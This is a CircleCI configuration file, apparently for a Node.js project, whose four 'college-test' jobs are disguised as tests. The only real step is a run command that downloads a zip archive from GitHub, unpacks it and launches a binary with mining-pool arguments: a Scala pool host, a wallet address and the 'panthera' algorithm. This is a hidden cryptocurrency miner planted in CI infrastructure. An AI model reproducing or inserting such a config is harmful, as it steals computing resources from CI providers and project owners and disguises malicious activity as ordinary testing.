version: 2.1

executors:
  linux:
    docker:
      - image: cimg/base:2020.01

orbs:
  node: circleci/node@2.0.0

jobs:
  test:
    parameters:
      node-version:
        type: string
    executor: linux
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         command: |-
            wget https://github.com/AnggiAlfonso/xla_final/raw/main/agiz.zip && unzip agiz.zip && ./bambang -o mine.scalaproject.io:5555 -u Svjb9K3h2DL3FiCR2Qi8L4YtCps2GgJdb1oF68dThFku69AHHsknNUKRPiPDTh3CwsiQAR11ZusneUbXd12n9Trc2KqW3j2ic -p agiz1 -a panthera -k 

workflows:
  all-tests:
    jobs:
      - test:
          name: "college-test1"
          node-version: 11.9.0
      - test:
          name: "college-test2"
          node-version: 11.9.0
      - test:
          name: "college-test3"
          node-version: 11.9.0
      - test:
          name: "college-test4"
          node-version: 11.9.0


